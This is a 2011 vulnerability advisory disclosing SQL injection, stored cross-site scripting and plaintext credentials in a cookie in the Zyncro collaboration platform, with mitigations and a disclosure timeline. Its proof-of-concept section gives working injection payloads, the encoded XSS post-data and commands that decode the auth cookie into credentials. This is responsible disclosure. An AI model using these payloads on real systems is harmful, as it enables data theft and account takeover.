============================================= INTERNET SECURITY AUDITORS ALERT 2011-003 - Original release date: 13th September 2011 - Last revised: 22nd September 2011 - Discovered by: Ferran Pichel - Severity: 7.5/10 (CVSSv2 Base Scored) ============================================= I. VULNERABILITIES ------------------------- Multiple vulnerabilities in Zyncro social network. II. BACKGROUND ------------------------- Zyncro is a platform designed for document collaboration, send, share & synchronize at an Enterprise-level. It is focused to make synchronization and sharing within a company easier. III. DESCRIPTION ------------------------- This product has at least the next vulnerabilities: 1.SQL Injection: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It happens from using poorly designed query language interpreters. 2.Persistent Cross-Site Scripting: The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. 3.Credentials transferred using Cookie: Cookie data is commonly used to customize web applications, but sometimes some sensible data may be stored. In this case, it's possible to retrieve user_mail and password used to log into the application. IV. PROOF OF CONCEPT ------------------------- 1.SQL Injection: The vulnerable feature is located into the 'Message' menu, there are at least two vulnerable resources: /zwall/list/filter//appIdFilter//shareGroupUrnFilter//shareGroupTypeFilter//shareDocumentUrnFilter/?popup=1&ayuda=&actualSection=folders&plainView=1&rand=9809 /ajax/getnewmessages/filter//appIdFilter//shareGroupUrnFilter//shareGroupTypeFilter//shareDocumentUrnFilter//dateFilter/1315854782869?popup=1&plainView=1&rand=21107 B64_GROUP_REFERENCE is a base64 string used to identify the group internally. Those references are like: c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nw== Once decoded: syncrum:sharegroup:32b32f9c-879a-44c4-9ef5-16d48a9aa167 Those values are used internally to retrieve the messages related to a specified group. Modifying the final string and re-encoding it again to base64 it's possible to do an SQL Injection attack. For example, next sentence allows an attacker to read first 200 messages from database: syncrum:sharegroup:32b32f9c-879a-44c4-9ef5-16d48a9aa167' or '1' like '1' limit 200 -- Encoded: c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nycgb3IgJzEnIGxpa2UgJzEnIGxpbWl0IDIwMCAtLQ== And finally the request: /zwall/list/filter//appIdFilter//shareGroupUrnFilter/c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nycgb3IgJzEnIGxpa2UgJzEnIGxpbWl0IDIwMCAtLQ==/shareGroupTypeFilter//shareDocumentUrnFilter/?popup=1&ayuda=&actualSection=folders&plainView=1&rand=9809 2.Persistent Cross-Site Scripting: One of the functionalities of Zyncro is the possibility of creating groups. The name and description of the groups are not correctly sanitized and it's possible to provoke some attacks. In order to do the attack, you must create a new group and capture the packet transferred to the server to modify it because validation is done in client-side (only) using javascript. The original request has three POST data parameters like: popup=1 & name=dGVzdA%3D%3D & description=dGVzdA%3D%3D Important data are 'name' and 'description' parameters, which are base64 encoded. In this case, both values are 'test': url_decode(dGVzdA%3D%3D) b64decode(dGVzdA==) test It is possible to provoke the XSS by changing those values as follows: "> Values MUST be in base64, so: b64encode("">") = Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4= Finally the post-data of the request would become: popup=1&name=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d&description=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d Once the request has reached the server, a new group would be created and any time that someone sees the name/description of the group, a pop-up would appear, this is the easiest attack. 3.Credentials transferred using Cookie: When an user logins to Zyncro application a cookie named '_auth' is set. Its aspect is like: _auth=VmxaT1JsVnNPVVpVVlVaS1ZFUjNha2w2TlZGUlZrNVVWakE1VTFKRWQycEplalIz; If it's b64 decoded three times: fpichel@debian:~$ echo -n VmxaT1JsVnNPVVpVVlVaS1ZFUjNha2w2TlZGUlZrNVVWakE1VTFKRWQycEplalIz | base64 -d VlZORlVsOUZUVUZKVER3akl6NVFRVk5UVjA5U1JEd2pJejR3 fpichel@debian:~$ echo -n VlZORlVsOUZUVUZKVER3akl6NVFRVk5UVjA5U1JEd2pJejR3 | base64 -d VVNFUl9FTUFJTDwjIz5QQVNTV09SRDwjIz4w fpichel@debian:~$ echo -n VVNFUl9FTUFJTDwjIz5QQVNTV09SRDwjIz4w | base64 -d USER_EMAIL<##>PASSWORD<##>0 Finally it's possible to retrieve the username and password used to enter the application. V. BUSINESS IMPACT ------------------------ The business impact depends on the type of the exploitation of each vulnerability. The worst scenario is the exposure of all the data stored in database using a Blind SQL Injection based on SQL Injection vulnerability described. The explained PoC may be used to read arbitrary messages from the database, including private messages. Another critical scenario came from the use of the Persistent XSS in combination with the '_auth' cookie variable vulnerability to send the '_auth' cookie to a server controlled by the attacker. In this case, it would be possible for the attacker to retrieve credentials used by the user in plain text, data must be base64 decoded three times. After that, the attacker would be able to Log In into the application as the victim does. VI. SYSTEMS AFFECTED ------------------------- The vulnerability affect all Zyncro versions: - www.zyncro.com (primary Zyncro website) - my.zyncro.com (demo platform) VII. SOLUTION ------------------------- In order to mitigate all the exposed problems next recommendations should be applied: - Sanitize all data sent by the user before and after decoding it to prevent SQL Injection attacks. - Sanitize all data sent to the user in order to prevent XSS attacks. - Change authentication design so not requiring the user_mail/password into Cookie data. Check all parts of the application that could be vulnerable to described issues. VIII. REFERENCES ------------------------- http://www.zyncro.com http://www.isecauditors.com IX. CREDITS ------------------------- These vulnerabilities have been discovered by Ferran Pichel Llaquet (fpichel (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- September 13, 2011: Initial release. September 22, 2011: Last revision. XI. DISCLOSURE TIMELINE ------------------------- September 13, 2011: The vulnerability is discovered and sent to vendor. September 22, 2011: Vendor notifies all problems were already corrected. Sent to lists. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. XIII. ABOUT ------------------------- Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.